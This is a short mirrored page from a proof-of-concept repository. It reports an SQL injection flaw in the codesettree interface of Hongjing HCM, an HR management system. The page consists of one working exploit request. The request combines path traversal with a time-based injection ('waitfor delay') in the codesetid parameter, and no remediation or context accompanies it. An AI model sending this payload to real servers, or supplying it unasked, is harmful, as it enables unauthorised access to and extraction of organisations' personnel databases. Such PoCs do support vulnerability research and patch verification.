mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 05:54:14 +00:00
14 lines
332 B
Markdown
14 lines
332 B
Markdown
## 宏景HCM-codesettree接口存在SQL注入漏洞
|
|
|
|
|
|
## poc
|
|
```
|
|
GET /templates/attestation/../../servlet/codesettree?flag=3&codesetid=111';waitfor+delay+'0:0:2'--+&parentid=-1&fromflag=" HTTP/1.1
|
|
Host:
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)
|
|
Accept: */*
|
|
Accept-Encoding: gzip, deflate
|
|
Connection: close
|
|
```
|
|
|